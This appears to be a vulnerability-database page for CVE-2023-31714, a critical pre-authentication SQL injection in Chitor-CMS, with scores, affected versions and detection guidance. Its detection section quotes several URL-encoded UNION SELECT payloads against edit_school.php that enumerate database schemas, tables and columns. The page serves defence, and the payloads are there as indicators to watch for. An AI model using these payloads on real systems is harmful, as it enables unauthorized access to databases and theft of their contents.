cbcvebase.
CVE-2023-31714
published 2023-08-30

CVE-2023-31714: Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.

PriorityP261critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.28%
86.9th percentile
Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.

Affected

1 ranges
VendorProductVersion rangeFixed in
waqaskanjuchitor-cms< 1.1.21.1.2

Detection & IOCsextracted from sources · hover to see the quote

path/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -
path/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x
path/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=
bytes
0x71707a6b71 / 0x716a6b6271
  • Monitor HTTP GET requests to /edit_school.php with an `id` parameter value beginning with a negative integer followed by a single quote and UNION ALL SELECT, indicating pre-authentication SQL injection exploitation.
  • Detect the hex-encoded canary strings 0x71707a6b71 ('qpzkq') and 0x716a6b6271 ('qjkbq') in HTTP request or response bodies; these are the attacker's unique delimiters used to extract SQL query results.
  • The exploit is pre-authentication (no login required); alert on UNION-based SQL injection payloads targeting INFORMATION_SCHEMA.SCHEMATA, INFORMATION_SCHEMA.TABLES, and INFORMATION_SCHEMA.COLUMNS via the edit_school.php endpoint.
  • Look for the separator hex string 0x787a6d64706c ('xzmdpl') in URL-encoded query parameters; it is used by the exploit to delimit column values within concatenated SQL output.
  • ·The vulnerability affects Chitor-CMS versions before 1.1.2; the fix was committed on 2023/04/16 at commit 69d3442. Ensure the patched version is deployed.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.